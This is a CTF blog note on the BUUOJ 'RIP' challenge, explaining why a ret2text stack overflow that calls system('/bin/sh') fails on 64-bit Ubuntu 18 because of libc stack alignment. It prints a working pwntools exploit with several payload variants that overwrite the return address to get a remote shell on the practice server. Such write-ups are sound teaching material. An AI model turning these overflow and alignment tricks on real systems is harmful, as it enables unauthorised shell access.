「Pwn」Ubuntu18 中 64位 ELF 在调用 system 时候可能出现的问题

title: Issues that may occur when calling system in 64-bit ELF in Ubuntu18 date: 2022-03-31 tags: [“Pwn”, cheatsheet, CTF] authors: [nova]

Issues that may occur when calling system in 64-bit ELF in Ubuntu18

Recently, when I set up Ubuntu18 and was testing it, I encountered a problem.

After researching for a long time, I finally solved it and decided to take some notes.

Challenge — Buuoj — RIP

{/* truncate */}

Problem

This challenge is a basic stack overflow problem. There is a backdoor function that directly calls system("/bin/sh"); with no protections enabled. In theory, overwriting the return address should be sufficient.

Indeed, it worked fine during local testing, but issues arose during remote testing.

Upon further investigation, I discovered that when a 64-bit ELF program in Ubuntu18 or later calls the system function, stack balance needs to be considered in libc.

Solution

Changing the payload length or performing stack pivoting can resolve this issue.

The main idea is to change the stack address.

Here is an example exploit:

from pwn import *
context(log_level='debug', arch='amd64', os='linux')


# sh = process("./pwn1")
sh = remote("node4.buuoj.cn", 29726)


# sh.recvuntil('please input\n')


backdoor_addr = 0x0401186
# payload = b'a'*(0xf+8) + p64(backdoor_addr) # Normal idea, but due to alignment issues, it will fail
# payload = b'a'*0xf + p64(backdoor_addr) # Exploit 1, not very clear why this works:<
# payload = b'a'*(0xf+8) + p64(backdoor_addr) + p64(backdoor_addr - 1) # Exploit 2, backdoor_addr - 1 corresponds to a 'retn', can be replaced with others for stack balance
payload = b'a'*(0xf+8) + p64(backdoor_addr + 1) # Exploit 3, +1 aligns the address checked for alignment to 0x10 in call_system function
"""
It doesn't have to be +1. Aligning up to 16 times should work. If not, try stack pivoting.
"""
sh.sendline(payload)
sh.interactive()

In-depth Analysis

Here, I plan to delve into the stack at this point, which also serves as an initial exploration of gdb.

Oh no, it seems like gdb in Ubuntu18 is not working properly. I’ll add more details once it’s fixed:<

Reference Blogs

Issues with calling system function in some 64-bit glibc payloads

Stack balance issues involved in ret2text

Solving the program coredump issue caused by MOVAPS instruction after upgrading to gcc7.3

{/* AI */}

Table of Contents